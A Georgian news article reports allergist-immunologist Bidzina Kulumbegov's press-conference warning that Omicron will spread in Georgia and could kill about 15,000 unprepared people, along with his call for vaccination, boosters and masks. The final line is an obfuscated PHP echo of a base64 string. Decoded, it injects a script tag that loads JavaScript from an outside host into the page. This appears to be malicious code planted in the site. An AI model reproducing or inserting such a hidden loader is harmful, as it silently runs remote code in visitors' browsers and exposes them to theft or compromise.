celsiusi
ავერსი საქკაბელი
"თუ მილიონნახევარი ადამიანი მოუმზადებლად შეხვდება „ომიკრონს“, მათი 1%, დაახლოებით, 15 000 დაიღუპება, ეს არის სამწუხარო რეალობა", - ამის შესახებ ალერგოლოგ-იმუნოლოგმა, ბიძინა კულუმბეგოვმა დღეს  "კვირის" პრესკლუბში გამართულ პრესკონფერენციაზე განაცხადა.
 
მან ისაუბრა კორონავირუსის ახალ შტამზე - „ომიკრონზე“  და აღნიშნა, რომ ის საქართველოში აუცილებლად გავრცელდება, თუმცა მთავარია, მომზადებული შევხვდეთ.
 
კულუმბეგოვის თქმით, ამ ეტაპზე ვაქცინაციის და ბუსტერ-დოზებით აცრის მაჩვენებელი კარგი არ არის, შესაბამისად, ქვეყანა „ომიკრონს“ მოუმზადებელი ხვდება.
 
„ჩვენი მოსახლეობის 50%-ზე მეტი ანუ მილიონნახევარი ადამიანი ვირუსის მიმართ მოწყვლადია, რაც სერიოზული რისკის და გამოწვევის წინაშე გვაყენებს, რადგან თუ დღეს გვაქვს 3-4 ათასი შემთხვევა ყოველდღიურად, „ომიკრონის“ დომინირების შემდეგ, შესაძლოა ყოველდღიურად, ინფიცირებულთა მაჩვენებელი 10 ათასს ასცდეს, რაც იქნება კატასტროფა ჩვენი ჯანდაცვის სისტემისთვის და კოლაფსის წინაშე დაგვაყენებს - ამის რისკი არსებობს. უნდა ავიცრათ, ვატაროთ პირბადე, მეტი მექანიზმი მსოფლიოს არ გააჩნია, წინააღმდეგ შემთხვევაში, ახალი ტალღა კი არა, შეიძლება ცუნამი მივიღოთ.
 
როგორც წინასწარი კვლევები აჩვენებს, „ომიკრონის“ გავრცელება გარდაუვალია, თუმცა პანიკის საფუძველი არ უნდა გავხადოთ. საათებს და დღეებს მნიშვნელობა არ აქვს. მოსახლეობას არ მოსწონს, მაგრამ უნდა ვთქვა, რომ როცა მილიონნახევარი ადამიანი არ არის იმუნური და მოუმზადებლად ხვდება „ომიკრონს“, მათი 1%, დაახლოებით, 15 000 ადამიანი დაიღუპება, ეს არის სამწუხარო რეალობა. ვერ დარჩება საქართველოში ვერცერთი ადამიანი, ვისაც „ომიკრონი“ არ შეხვდება“, - განაცხადა ბიძინა კულუმბეგოვმა.
 
რაც შეეხება თავად „ომიკრონს“, როგორც ექიმი განმარტავს, ამ ეტაპზე რაიმე განმასხვავებელი ნიშანი, რომლითაც შეიძლება გამოვიცნოთ, რომ კორონავირუსის ეს სახეობა გვაქვს, დადგენილი არ არის, თუმცა ბიძინა კულუმბეგოვის თქმით, ამ ეტაპზე ამბობენ, რომ „ომიკრონს“ თავის, კუნთების და ყელის ტკივილი ახასიათებს.
 
„ომიკრონი“ ვრცელდება სწრაფად. ჯერჯერობით, მონაცემები, რომ უფრო მსუბუქია, ვიდრე კორონავირუსის სხვა სახეობები, არ გვაქვს, თუმცა კარგია თუნდაც ის, რომ უფრო მძიმე მიმდინარეობაზე არავინ საუბრობს. ცალსახაა, რომ ეს ვარიანტი ემალება ბუნებრივ იმუნიტეტს და ვაქცინაციას, თუმცა ე.წ. ბუსტერ-დოზით აცრის შემთხვევაში, დაცვის მაჩვენებელი 75%-ს უტოლდება“, - აღნიშნა ექიმმა.
1509
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");